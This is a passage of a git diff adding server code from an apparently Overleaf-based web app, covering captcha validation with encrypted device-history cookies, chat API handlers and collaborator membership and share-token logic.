+async function initializeDeviceHistory(req) { + req.deviceHistory = new DeviceHistory() + try { + await req.deviceHistory.parse(req) + } catch (err) { + logger.err({ err }, 'cannot parse deviceHistory') + } +} + +async function canSkipCaptcha(req, res) { + const trustedUser = + req.body?.email && Settings.recaptcha.trustedUsers.includes(req.body.email) + if (trustedUser) { + return res.json(true) + } + await initializeDeviceHistory(req) + const canSkip = req.deviceHistory.has(req.body?.email) + Metrics.inc('captcha_pre_flight', 1, { + status: canSkip ? 'skipped' : 'missing', + }) + res.json(canSkip) +} + +function validateCaptcha(action) { + return expressify(async function (req, res, next) { + const email = EmailsHelper.parseEmail(req.body?.email) + const trustedUser = + email && + (Settings.recaptcha.trustedUsers.includes(email) || + Settings.recaptcha.trustedUsersRegex?.test(email)) + if (!Settings.recaptcha?.siteKey || Settings.recaptcha.disabled[action]) { + if (action === 'login') { + AuthenticationController.setAuditInfo(req, { captcha: 'disabled' }) + } + Metrics.inc('captcha', 1, { path: action, status: 'disabled' }) + return next() + } + if (trustedUser) { + if (action === 'login') { + AuthenticationController.setAuditInfo(req, { captcha: 'trusted' }) + } + Metrics.inc('captcha', 1, { path: action, status: 'trusted' }) + return next() + } + const reCaptchaResponse = req.body['g-recaptcha-response'] + if (action === 'login') { + await initializeDeviceHistory(req) + const fromKnownDevice = req.deviceHistory.has(email) + AuthenticationController.setAuditInfo(req, { fromKnownDevice }) + if (!reCaptchaResponse && fromKnownDevice) { + // The user has previously logged in from this device, which required + // solving a captcha or keeping the device history alive. + // We can skip checking the (missing) captcha response. + AuthenticationController.setAuditInfo(req, { captcha: 'skipped' }) + Metrics.inc('captcha', 1, { path: action, status: 'skipped' }) + return next() + } + } + if (!reCaptchaResponse) { + Metrics.inc('captcha', 1, { path: action, status: 'missing' }) + return respondInvalidCaptcha(req, res) + } + + let body + try { + body = await fetchJson(Settings.recaptcha.endpoint, { + method: 'POST', + body: new URLSearchParams([ + ['secret', Settings.recaptcha.secretKey], + ['response', reCaptchaResponse], + ]), + }) + } catch (err) { + Metrics.inc('captcha', 1, { path: action, status: 'error' }) + throw OError.tag(err, 'failed recaptcha siteverify request', { + body: err.body, + }) + } + + if (!body.success) { + logger.warn( + { statusCode: 200, body }, + 'failed recaptcha siteverify request' + ) + Metrics.inc('captcha', 1, { path: action, status: 'failed' }) + return respondInvalidCaptcha(req, res) + } + Metrics.inc('captcha', 1, { path: action, status: 'solved' }) + if (action === 'login') { + AuthenticationController.setAuditInfo(req, { captcha: 'solved' }) + } + next() + }) +} + +module.exports = { + respondInvalidCaptcha, + validateCaptcha, + canSkipCaptcha: expressify(canSkipCaptcha), +} diff --git a/services/web/app/src/Features/Captcha/DeviceHistory.js b/services/web/app/src/Features/Captcha/DeviceHistory.js new file mode 100644 index 0000000..06b90b2 --- /dev/null +++ b/services/web/app/src/Features/Captcha/DeviceHistory.js @@ -0,0 +1,103 @@ +const crypto = require('crypto') +const jose = require('jose') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') + +const COOKIE_NAME = Settings.deviceHistory.cookieName +const ENTRY_EXPIRY = Settings.deviceHistory.entryExpiry +const MAX_ENTRIES = Settings.deviceHistory.maxEntries + +let SECRET +if (Settings.deviceHistory.secret) { + SECRET = crypto.createSecretKey( + Buffer.from(Settings.deviceHistory.secret, 'hex') + ) +} +const CONTENT_ENCRYPTION_ALGORITHM = 'A256GCM' +const KEY_MANAGEMENT_ALGORITHM = 'A256GCMKW' +const ENCRYPTION_HEADER = { + alg: KEY_MANAGEMENT_ALGORITHM, + enc: CONTENT_ENCRYPTION_ALGORITHM, +} +const DECRYPTION_OPTIONS = { + contentEncryptionAlgorithms: [CONTENT_ENCRYPTION_ALGORITHM], + keyManagementAlgorithms: [KEY_MANAGEMENT_ALGORITHM], +} + +const ENCODER = new TextEncoder() +const DECODER = new TextDecoder() + +class DeviceHistory { + constructor() { + this.entries = [] + } + + has(email) { + return this.entries.some(entry => entry.e === email) + } + + add(email) { + // Entries are sorted by age, starting from oldest (idx 0) to newest. + // When parsing/serializing we are looking at the last n=MAX_ENTRIES entries + // from the list and discard any other stale entries. + this.entries = this.entries.filter(entry => entry.e !== email) + this.entries.push({ e: email, t: Date.now() }) + } + + async serialize(res) { + let v = '' + if (this.entries.length > 0 && SECRET) { + v = await new jose.CompactEncrypt( + ENCODER.encode(JSON.stringify(this.entries.slice(-MAX_ENTRIES))) + ) + .setProtectedHeader(ENCRYPTION_HEADER) + .encrypt(SECRET) + } + + const options = { + domain: Settings.cookieDomain, + maxAge: ENTRY_EXPIRY, + secure: Settings.secureCookie, + sameSite: Settings.sameSiteCookie, + httpOnly: true, + path: '/login', + } + if (v) { + res.cookie(COOKIE_NAME, v, options) + } else { + options.maxAge = -1 + res.clearCookie(COOKIE_NAME, options) + } + } + + async parse(req) { + const blob = req.cookies[COOKIE_NAME] + if (!blob || !SECRET) { + Metrics.inc('device_history', 1, { status: 'missing' }) + return + } + try { + const { plaintext } = await jose.compactDecrypt( + blob, + SECRET, + DECRYPTION_OPTIONS + ) + const minTimestamp = Date.now() - ENTRY_EXPIRY + this.entries = JSON.parse(DECODER.decode(plaintext)) + .slice(-MAX_ENTRIES) + .filter(entry => entry.t > minTimestamp) + } catch (err) { + Metrics.inc('device_history', 1, { status: 'failure' }) + throw err + } + if (this.entries.length === MAX_ENTRIES) { + // Track hitting the limit, we might need to increase the limit. + Metrics.inc('device_history_at_limit') + } + // Collect quantiles of the size + Metrics.summary('device_history_size', this.entries.length) + Metrics.inc('device_history', 1, { status: 'success' }) + } +} + +module.exports = DeviceHistory diff --git a/services/web/app/src/Features/Chat/ChatApiHandler.js b/services/web/app/src/Features/Chat/ChatApiHandler.js new file mode 100644 index 0000000..2929891 --- /dev/null +++ b/services/web/app/src/Features/Chat/ChatApiHandler.js @@ -0,0 +1,166 @@ +// @ts-check + +const { fetchJson, fetchNothing } = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') +const { callbackify } = require('util') + +async function getThreads(projectId) { + return await fetchJson(chatApiUrl(`/project/${projectId}/threads`)) +} + +async function destroyProject(projectId) { + await fetchNothing(chatApiUrl(`/project/${projectId}`), { method: 'DELETE' }) +} + +async function sendGlobalMessage(projectId, userId, content) { + const message = await fetchJson( + chatApiUrl(`/project/${projectId}/messages`), + { + method: 'POST', + json: { user_id: userId, content }, + } + ) + return message +} + +async function getGlobalMessages(projectId, limit, before) { + const url = chatApiUrl(`/project/${projectId}/messages`) + if (limit != null) { + url.searchParams.set('limit', limit) + } + if (before != null) { + url.searchParams.set('before', before) + } + + return await fetchJson(url) +} + +async function sendComment(projectId, threadId, userId, content) { + const comment = await fetchJson( + chatApiUrl(`/project/${projectId}/thread/${threadId}/messages`), + { + method: 'POST', + json: { user_id: userId, content }, + } + ) + return comment +} + +async function resolveThread(projectId, threadId, userId) { + await fetchNothing( + chatApiUrl(`/project/${projectId}/thread/${threadId}/resolve`), + { + method: 'POST', + json: { user_id: userId }, + } + ) +} + +async function reopenThread(projectId, threadId) { + await fetchNothing( + chatApiUrl(`/project/${projectId}/thread/${threadId}/reopen`), + { method: 'POST' } + ) +} + +async function deleteThread(projectId, threadId) { + await fetchNothing(chatApiUrl(`/project/${projectId}/thread/${threadId}`), { + method: 'DELETE', + }) +} + +async function editMessage(projectId, threadId, messageId, userId, content) { + await fetchNothing( + chatApiUrl( + `/project/${projectId}/thread/${threadId}/messages/${messageId}/edit` + ), + { + method: 'POST', + json: { content, userId }, + } + ) +} + +async function deleteMessage(projectId, threadId, messageId) { + await fetchNothing( + chatApiUrl( + `/project/${projectId}/thread/${threadId}/messages/${messageId}` + ), + { method: 'DELETE' } + ) +} + +async function deleteUserMessage(projectId, threadId, userId, messageId) { + await fetchNothing( + chatApiUrl( + `/project/${projectId}/thread/${threadId}/user/${userId}/messages/${messageId}` + ), + { method: 'DELETE' } + ) +} + +async function getResolvedThreadIds(projectId) { + const body = await fetchJson( + chatApiUrl(`/project/${projectId}/resolved-thread-ids`) + ) + return body.resolvedThreadIds +} + +async function duplicateCommentThreads(projectId, threads) { + return await fetchJson( + chatApiUrl(`/project/${projectId}/duplicate-comment-threads`), + { + method: 'POST', + json: { + threads, + }, + } + ) +} + +async function generateThreadData(projectId, threads) { + return await fetchJson( + chatApiUrl(`/project/${projectId}/generate-thread-data`), + { + method: 'POST', + json: { threads }, + } + ) +} + +function chatApiUrl(path) { + return new URL(path, settings.apis.chat.internal_url) +} + +module.exports = { + getThreads: callbackify(getThreads), + destroyProject: callbackify(destroyProject), + sendGlobalMessage: callbackify(sendGlobalMessage), + getGlobalMessages: callbackify(getGlobalMessages), + sendComment: callbackify(sendComment), + resolveThread: callbackify(resolveThread), + reopenThread: callbackify(reopenThread), + deleteThread: callbackify(deleteThread), + editMessage: callbackify(editMessage), + deleteMessage: callbackify(deleteMessage), + deleteUserMessage: callbackify(deleteUserMessage), + getResolvedThreadIds: callbackify(getResolvedThreadIds), + duplicateCommentThreads: callbackify(duplicateCommentThreads), + generateThreadData: callbackify(generateThreadData), + promises: { + getThreads, + destroyProject, + sendGlobalMessage, + getGlobalMessages, + sendComment, + resolveThread, + reopenThread, + deleteThread, + editMessage, + deleteMessage, + deleteUserMessage, + getResolvedThreadIds, + duplicateCommentThreads, + generateThreadData, + }, +} diff --git a/services/web/app/src/Features/Chat/ChatController.js b/services/web/app/src/Features/Chat/ChatController.js new file mode 100644 index 0000000..51d217e --- /dev/null +++ b/services/web/app/src/Features/Chat/ChatController.js @@ -0,0 +1,84 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ChatController +const ChatApiHandler = require('./ChatApiHandler') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') +const SessionManager = require('../Authentication/SessionManager') +const UserInfoManager = require('../User/UserInfoManager') +const UserInfoController = require('../User/UserInfoController') +const ChatManager = require('./ChatManager') +const logger = require('@overleaf/logger') + +module.exports = ChatController = { + sendMessage(req, res, next) { + const { project_id: projectId } = req.params + const { content, client_id: clientId } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + if (userId == null) { + const err = new Error('no logged-in user') + return next(err) + } + return ChatApiHandler.sendGlobalMessage( + projectId, + userId, + content, + function (err, message) { + if (err != null) { + return next(err) + } + return UserInfoManager.getPersonalInfo( + message.user_id, + function (err, user) { + if (err != null) { + return next(err) + } + message.user = UserInfoController.formatPersonalInfo(user) + message.clientId = clientId + EditorRealTimeController.emitToRoom( + projectId, + 'new-chat-message', + message + ) + return res.sendStatus(204) + } + ) + } + ) + }, + + getMessages(req, res, next) { + const { project_id: projectId } = req.params + const { query } = req + return ChatApiHandler.getGlobalMessages( + projectId, + query.limit, + query.before, + function (err, messages) { + if (err != null) { + return next(err) + } + return ChatManager.injectUserInfoIntoThreads( + { global: { messages } }, + function (err) { + if (err != null) { + return next(err) + } + return res.json(messages) + } + ) + } + ) + }, +} diff --git a/services/web/app/src/Features/Chat/ChatManager.js b/services/web/app/src/Features/Chat/ChatManager.js new file mode 100644 index 0000000..9625881 --- /dev/null +++ b/services/web/app/src/Features/Chat/ChatManager.js @@ -0,0 +1,61 @@ +const async = require('async') +const UserInfoManager = require('../User/UserInfoManager') +const UserInfoController = require('../User/UserInfoController') +const { promisify } = require('@overleaf/promise-utils') + +function injectUserInfoIntoThreads(threads, callback) { + // There will be a lot of repitition of user_ids, so first build a list + // of unique ones to perform db look ups on, then use these to populate the + // user fields + let message, thread, threadId, userId + if (callback == null) { + callback = function () {} + } + const userIds = {} + for (threadId in threads) { + thread = threads[threadId] + if (thread.resolved) { + userIds[thread.resolved_by_user_id] = true + } + for (message of Array.from(thread.messages)) { + userIds[message.user_id] = true + } + } + + const jobs = [] + const users = {} + for (userId in userIds) { + ;(userId => + jobs.push(cb => + UserInfoManager.getPersonalInfo(userId, function (error, user) { + if (error != null) return cb(error) + user = UserInfoController.formatPersonalInfo(user) + users[userId] = user + cb() + }) + ))(userId) + } + + return async.series(jobs, function (error) { + if (error != null) { + return callback(error) + } + for (threadId in threads) { + thread = threads[threadId] + if (thread.resolved) { + thread.resolved_by_user = users[thread.resolved_by_user_id] + } + for (message of Array.from(thread.messages)) { + message.user = users[message.user_id] + } + } + return callback(null, threads) + }) +} + +module.exports = { + injectUserInfoIntoThreads, + promises: { + injectUserInfoIntoThreads: promisify(injectUserInfoIntoThreads), + }, +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsController.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsController.mjs new file mode 100644 index 0000000..d2cecbc --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsController.mjs @@ -0,0 +1,202 @@ +import OError from '@overleaf/o-error' +import HttpErrorHandler from '../../Features/Errors/HttpErrorHandler.js' +import mongodb from 'mongodb-legacy' +import CollaboratorsHandler from './CollaboratorsHandler.js' +import CollaboratorsGetter from './CollaboratorsGetter.js' +import OwnershipTransferHandler from './OwnershipTransferHandler.js' +import SessionManager from '../Authentication/SessionManager.js' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import TagsHandler from '../Tags/TagsHandler.js' +import Errors from '../Errors/Errors.js' +import logger from '@overleaf/logger' +import { expressify } from '@overleaf/promise-utils' +import { hasAdminAccess } from '../Helpers/AdminAuthorizationHelper.js' +import TokenAccessHandler from '../TokenAccess/TokenAccessHandler.js' +import ProjectAuditLogHandler from '../Project/ProjectAuditLogHandler.js' +import LimitationsManager from '../Subscription/LimitationsManager.js' + +const ObjectId = mongodb.ObjectId + +export default { + removeUserFromProject: expressify(removeUserFromProject), + removeSelfFromProject: expressify(removeSelfFromProject), + getAllMembers: expressify(getAllMembers), + setCollaboratorInfo: expressify(setCollaboratorInfo), + transferOwnership: expressify(transferOwnership), + getShareTokens: expressify(getShareTokens), +} + +async function removeUserFromProject(req, res, next) { + const projectId = req.params.Project_id + const userId = req.params.user_id + const sessionUserId = SessionManager.getLoggedInUserId(req.session) + await _removeUserIdFromProject(projectId, userId) + EditorRealTimeController.emitToRoom(projectId, 'project:membership:changed', { + members: true, + }) + + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'remove-collaborator', + sessionUserId, + req.ip, + { userId } + ) + + res.sendStatus(204) +} + +async function removeSelfFromProject(req, res, next) { + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + await _removeUserIdFromProject(projectId, userId) + + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'leave-project', + userId, + req.ip + ) + + res.sendStatus(204) +} + +async function getAllMembers(req, res, next) { + const projectId = req.params.Project_id + logger.debug({ projectId }, 'getting all active members for project') + let members + try { + members = await CollaboratorsGetter.promises.getAllInvitedMembers(projectId) + } catch (err) { + throw OError.tag(err, 'error getting members for project', { projectId }) + } + res.json({ members }) +} + +async function setCollaboratorInfo(req, res, next) { + try { + const projectId = req.params.Project_id + const userId = req.params.user_id + const { privilegeLevel } = req.body + + const allowed = + await LimitationsManager.promises.canChangeCollaboratorPrivilegeLevel( + projectId, + userId, + privilegeLevel + ) + if (!allowed) { + return HttpErrorHandler.forbidden( + req, + res, + 'edit collaborator limit reached' + ) + } + + await CollaboratorsHandler.promises.setCollaboratorPrivilegeLevel( + projectId, + userId, + privilegeLevel + ) + EditorRealTimeController.emitToRoom( + projectId, + 'project:collaboratorAccessLevel:changed', + { userId } + ) + res.sendStatus(204) + } catch (err) { + if (err instanceof Errors.NotFoundError) { + HttpErrorHandler.notFound(req, res) + } else { + next(err) + } + } +} + +async function transferOwnership(req, res, next) { + const sessionUser = SessionManager.getSessionUser(req.session) + const projectId = req.params.Project_id + const toUserId = req.body.user_id + try { + await OwnershipTransferHandler.promises.transferOwnership( + projectId, + toUserId, + { + allowTransferToNonCollaborators: hasAdminAccess(sessionUser), + sessionUserId: new ObjectId(sessionUser._id), + ipAddress: req.ip, + } + ) + res.sendStatus(204) + } catch (err) { + if (err instanceof Errors.ProjectNotFoundError) { + HttpErrorHandler.notFound(req, res, `project not found: ${projectId}`) + } else if (err instanceof Errors.UserNotFoundError) { + HttpErrorHandler.notFound(req, res, `user not found: ${toUserId}`) + } else if (err instanceof Errors.UserNotCollaboratorError) { + HttpErrorHandler.forbidden( + req, + res, + `user ${toUserId} should be a collaborator in project ${projectId} prior to ownership transfer` + ) + } else { + next(err) + } + } +} + +async function _removeUserIdFromProject(projectId, userId) { + await CollaboratorsHandler.promises.removeUserFromProject(projectId, userId) + EditorRealTimeController.emitToRoom( + projectId, + 'userRemovedFromProject', + userId + ) + await TagsHandler.promises.removeProjectFromAllTags(userId, projectId) +} + +async function getShareTokens(req, res) { + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + + let tokens + if (userId) { + tokens = await CollaboratorsGetter.promises.getPublicShareTokens( + new ObjectId(userId), + new ObjectId(projectId) + ) + } else { + // anonymous access, the token is already available in the session + const readOnly = TokenAccessHandler.getRequestToken(req, projectId) + tokens = { readOnly } + } + if (!tokens) { + return res.sendStatus(403) + } + + if (tokens.readOnly || tokens.readAndWrite) { + logger.info( + { + projectId, + userId: userId || 'anonymous', + ip: req.ip, + tokens: Object.keys(tokens), + }, + 'project tokens accessed' + ) + } + + if (tokens.readOnly) { + tokens.readOnlyHashPrefix = TokenAccessHandler.createTokenHashPrefix( + tokens.readOnly + ) + } + + if (tokens.readAndWrite) { + tokens.readAndWriteHashPrefix = TokenAccessHandler.createTokenHashPrefix( + tokens.readAndWrite + ) + } + + res.json(tokens) +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsEmailHandler.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsEmailHandler.mjs new file mode 100644 index 0000000..d63206d --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsEmailHandler.mjs @@ -0,0 +1,37 @@ +import { callbackify } from 'node:util' +import { Project } from '../../models/Project.js' +import EmailHandler from '../Email/EmailHandler.js' +import Settings from '@overleaf/settings' + +const CollaboratorsEmailHandler = { + _buildInviteUrl(project, invite) { + return `${Settings.siteUrl}/project/${project._id}/invite/token/${invite.token}` + }, + + async notifyUserOfProjectInvite(projectId, email, invite, sendingUser) { + // eslint-disable-next-line no-restricted-syntax + const project = await Project.findOne({ _id: projectId }) + .select('name owner_ref') + .populate('owner_ref') + .exec() + const emailOptions = { + to: email, + replyTo: project.owner_ref.email, + project: { + name: project.name, + }, + inviteUrl: CollaboratorsEmailHandler._buildInviteUrl(project, invite), + owner: project.owner_ref, + sendingUser_id: sendingUser._id, + } + await EmailHandler.promises.sendEmail('projectInvite', emailOptions) + }, +} + +export default { + promises: CollaboratorsEmailHandler, + notifyUserOfProjectInvite: callbackify( + CollaboratorsEmailHandler.notifyUserOfProjectInvite + ), + _buildInviteUrl: CollaboratorsEmailHandler._buildInviteUrl, +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsGetter.js b/services/web/app/src/Features/Collaborators/CollaboratorsGetter.js new file mode 100644 index 0000000..77fb7ab --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsGetter.js @@ -0,0 +1,418 @@ +const { callbackify } = require('util') +const pLimit = require('p-limit') +const { ObjectId } = require('mongodb-legacy') +const OError = require('@overleaf/o-error') +const { Project } = require('../../models/Project') +const UserGetter = require('../User/UserGetter') +const ProjectGetter = require('../Project/ProjectGetter') +const PublicAccessLevels = require('../Authorization/PublicAccessLevels') +const Errors = require('../Errors/Errors') +const ProjectEditorHandler = require('../Project/ProjectEditorHandler') +const Sources = require('../Authorization/Sources') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') + +module.exports = { + getMemberIdsWithPrivilegeLevels: callbackify(getMemberIdsWithPrivilegeLevels), + getMemberIds: callbackify(getMemberIds), + getInvitedMemberIds: callbackify(getInvitedMemberIds), + getInvitedMembersWithPrivilegeLevels: callbackify( + getInvitedMembersWithPrivilegeLevels + ), + getInvitedMembersWithPrivilegeLevelsFromFields: callbackify( + getInvitedMembersWithPrivilegeLevelsFromFields + ), + getMemberIdPrivilegeLevel: callbackify(getMemberIdPrivilegeLevel), + getProjectsUserIsMemberOf: callbackify(getProjectsUserIsMemberOf), + dangerouslyGetAllProjectsUserIsMemberOf: callbackify( + dangerouslyGetAllProjectsUserIsMemberOf + ), + isUserInvitedMemberOfProject: callbackify(isUserInvitedMemberOfProject), + getPublicShareTokens: callbackify(getPublicShareTokens), + userIsTokenMember: callbackify(userIsTokenMember), + getAllInvitedMembers: callbackify(getAllInvitedMembers), + promises: { + getMemberIdsWithPrivilegeLevels, + getMemberIds, + getInvitedMemberIds, + getInvitedMembersWithPrivilegeLevels, + getInvitedMembersWithPrivilegeLevelsFromFields, + getMemberIdPrivilegeLevel, + getInvitedEditCollaboratorCount, + getInvitedPendingEditorCount, + getProjectsUserIsMemberOf, + dangerouslyGetAllProjectsUserIsMemberOf, + isUserInvitedMemberOfProject, + isUserInvitedReadWriteMemberOfProject, + getPublicShareTokens, + userIsTokenMember, + userIsReadWriteTokenMember, + getAllInvitedMembers, + }, +} + +async function getMemberIdsWithPrivilegeLevels(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + collaberator_refs: 1, + readOnly_refs: 1, + tokenAccessReadOnly_refs: 1, + tokenAccessReadAndWrite_refs: 1, + publicAccesLevel: 1, + pendingEditor_refs: 1, + reviewer_refs: 1, + pendingReviewer_refs: 1, + }) + if (!project) { + throw new Errors.NotFoundError(`no project found with id ${projectId}`) + } + const memberIds = _getMemberIdsWithPrivilegeLevelsFromFields( + project.owner_ref, + project.collaberator_refs, + project.readOnly_refs, + project.tokenAccessReadAndWrite_refs, + project.tokenAccessReadOnly_refs, + project.publicAccesLevel, + project.pendingEditor_refs, + project.reviewer_refs, + project.pendingReviewer_refs + ) + return memberIds +} + +async function getMemberIds(projectId) { + const members = await getMemberIdsWithPrivilegeLevels(projectId) + return members.map(m => m.id) +} + +async function getInvitedMemberIds(projectId) { + const members = await getMemberIdsWithPrivilegeLevels(projectId) + return members.filter(m => m.source !== Sources.TOKEN).map(m => m.id) +} + +async function getInvitedMembersWithPrivilegeLevels(projectId) { + let members = await getMemberIdsWithPrivilegeLevels(projectId) + members = members.filter(m => m.source !== Sources.TOKEN) + return _loadMembers(members) +} + +async function getInvitedMembersWithPrivilegeLevelsFromFields( + ownerId, + collaboratorIds, + readOnlyIds, + reviewerIds +) { + const members = _getMemberIdsWithPrivilegeLevelsFromFields( + ownerId, + collaboratorIds, + readOnlyIds, + [], + [], + null, + [], + reviewerIds, + [] + ) + return _loadMembers(members) +} + +async function getMemberIdPrivilegeLevel(userId, projectId) { + // In future if the schema changes and getting all member ids is more expensive (multiple documents) + // then optimise this. + if (userId == null) { + return PrivilegeLevels.NONE + } + const members = await getMemberIdsWithPrivilegeLevels(projectId) + for (const member of members) { + if (member.id === userId.toString()) { + return member.privilegeLevel + } + } + return PrivilegeLevels.NONE +} + +async function getInvitedEditCollaboratorCount(projectId) { + // Counts invited members with editor or reviewer roles + const members = await getMemberIdsWithPrivilegeLevels(projectId) + return members.filter( + m => + m.source === Sources.INVITE && + (m.privilegeLevel === PrivilegeLevels.READ_AND_WRITE || + m.privilegeLevel === PrivilegeLevels.REVIEW) + ).length +} + +async function getInvitedPendingEditorCount(projectId) { + // Only counts invited members that are readonly pending editors or pending + // reviewers + const members = await getMemberIdsWithPrivilegeLevels(projectId) + return members.filter( + m => + m.source === Sources.INVITE && + m.privilegeLevel === PrivilegeLevels.READ_ONLY && + (m.pendingEditor || m.pendingReviewer) + ).length +} + +async function isUserInvitedMemberOfProject(userId, projectId) { + if (!userId) { + return false + } + const members = await getMemberIdsWithPrivilegeLevels(projectId) + for (const member of members) { + if ( + member.id.toString() === userId.toString() && + member.source !== Sources.TOKEN + ) { + return true + } + } + return false +} + +async function isUserInvitedReadWriteMemberOfProject(userId, projectId) { + if (!userId) { + return false + } + const members = await getMemberIdsWithPrivilegeLevels(projectId) + for (const member of members) { + if ( + member.id.toString() === userId.toString() && + member.source !== Sources.TOKEN && + member.privilegeLevel === PrivilegeLevels.READ_AND_WRITE + ) { + return true + } + } + return false +} + +async function getPublicShareTokens(userId, projectId) { + const memberInfo = await Project.findOne( + { + _id: projectId, + }, + { + isOwner: { $eq: ['$owner_ref', userId] }, + hasTokenReadOnlyAccess: { + $and: [ + { $in: [userId, '$tokenAccessReadOnly_refs'] }, + { $eq: ['$publicAccesLevel', PublicAccessLevels.TOKEN_BASED] }, + ], + }, + tokens: 1, + } + ) + .lean() + .exec() + + if (!memberInfo) { + return null + } + + if (memberInfo.isOwner) { + return memberInfo.tokens + } else if (memberInfo.hasTokenReadOnlyAccess) { + return { + readOnly: memberInfo.tokens.readOnly, + } + } else { + return {} + } +} + +// This function returns all the projects that a user currently has access to, +// excluding projects where the user is listed in the token access fields when +// token access has been disabled. +async function getProjectsUserIsMemberOf(userId, fields) { + const limit = pLimit(2) + const [readAndWrite, review, readOnly, tokenReadAndWrite, tokenReadOnly] = + await Promise.all([ + limit(() => Project.find({ collaberator_refs: userId }, fields).exec()), + limit(() => Project.find({ reviewer_refs: userId }, fields).exec()), + limit(() => Project.find({ readOnly_refs: userId }, fields).exec()), + limit(() => + Project.find( + { + tokenAccessReadAndWrite_refs: userId, + publicAccesLevel: PublicAccessLevels.TOKEN_BASED, + }, + fields + ).exec() + ), + limit(() => + Project.find( + { + tokenAccessReadOnly_refs: userId, + publicAccesLevel: PublicAccessLevels.TOKEN_BASED, + }, + fields + ).exec() + ), + ]) + return { readAndWrite, review, readOnly, tokenReadAndWrite, tokenReadOnly } +} + +// This function returns all the projects that a user is a member of, regardless of +// the current state of the project, so it includes those projects where token access +// has been disabled. +async function dangerouslyGetAllProjectsUserIsMemberOf(userId, fields) { + const readAndWrite = await Project.find( + { collaberator_refs: userId }, + fields + ).exec() + const readOnly = await Project.find({ readOnly_refs: userId }, fields).exec() + const tokenReadAndWrite = await Project.find( + { tokenAccessReadAndWrite_refs: userId }, + fields + ).exec() + const tokenReadOnly = await Project.find( + { tokenAccessReadOnly_refs: userId }, + fields + ).exec() + return { readAndWrite, readOnly, tokenReadAndWrite, tokenReadOnly } +} + +async function getAllInvitedMembers(projectId) { + try { + const rawMembers = await getInvitedMembersWithPrivilegeLevels(projectId) + const { members } = + ProjectEditorHandler.buildOwnerAndMembersViews(rawMembers) + return members + } catch (err) { + throw OError.tag(err, 'error getting members for project', { projectId }) + } +} + +async function userIsTokenMember(userId, projectId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + const project = await Project.findOne( + { + _id: projectId, + $or: [ + { tokenAccessReadOnly_refs: userId }, + { tokenAccessReadAndWrite_refs: userId }, + ], + }, + { + _id: 1, + } + ).exec() + return project != null +} + +async function userIsReadWriteTokenMember(userId, projectId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + const project = await Project.findOne( + { + _id: projectId, + tokenAccessReadAndWrite_refs: userId, + }, + { + _id: 1, + } + ).exec() + return project != null +} + +function _getMemberIdsWithPrivilegeLevelsFromFields( + ownerId, + collaboratorIds, + readOnlyIds, + tokenAccessIds, + tokenAccessReadOnlyIds, + publicAccessLevel, + pendingEditorIds, + reviewerIds, + pendingReviewerIds +) { + const members = [] + members.push({ + id: ownerId.toString(), + privilegeLevel: PrivilegeLevels.OWNER, + source: Sources.OWNER, + }) + + for (const memberId of collaboratorIds || []) { + members.push({ + id: memberId.toString(), + privilegeLevel: PrivilegeLevels.READ_AND_WRITE, + source: Sources.INVITE, + }) + } + + for (const memberId of readOnlyIds || []) { + const record = { + id: memberId.toString(), + privilegeLevel: PrivilegeLevels.READ_ONLY, + source: Sources.INVITE, + } + + if (pendingEditorIds?.some(pe => memberId.equals(pe))) { + record.pendingEditor = true + } else if (pendingReviewerIds?.some(pr => memberId.equals(pr))) { + record.pendingReviewer = true + } + members.push(record) + } + + if (publicAccessLevel === PublicAccessLevels.TOKEN_BASED) { + for (const memberId of tokenAccessIds || []) { + members.push({ + id: memberId.toString(), + privilegeLevel: PrivilegeLevels.READ_AND_WRITE, + source: Sources.TOKEN, + }) + } + for (const memberId of tokenAccessReadOnlyIds || []) { + members.push({ + id: memberId.toString(), + privilegeLevel: PrivilegeLevels.READ_ONLY, + source: Sources.TOKEN, + }) + } + } + + for (const memberId of reviewerIds || []) { + members.push({ + id: memberId.toString(), + privilegeLevel: PrivilegeLevels.REVIEW, + source: Sources.INVITE, + }) + } + return members +} + +async function _loadMembers(members) { + const limit = pLimit(3) + const results = await Promise.all( + members.map(member => + limit(async () => { + const user = await UserGetter.promises.getUser(member.id, { + _id: 1, + email: 1, + features: 1, + first_name: 1, + last_name: 1, + signUpDate: 1, + }) + if (user != null) { + const record = { + user, + privilegeLevel: member.privilegeLevel, + } + if (member.pendingEditor) { + record.pendingEditor = true + } else if (member.pendingReviewer) { + record.pendingReviewer = true + } + return record + } else { + return null + } + }) + ) + ) + return results.filter(r => r != null) +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsHandler.js b/services/web/app/src/Features/Collaborators/CollaboratorsHandler.js new file mode 100644 index 0000000..05137a9 --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsHandler.js @@ -0,0 +1,468 @@ +const { callbackify } = require('util') +const OError = require('@overleaf/o-error') +const { Project } = require('../../models/Project') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectHelper = require('../Project/ProjectHelper') +const logger = require('@overleaf/logger') +const ContactManager = 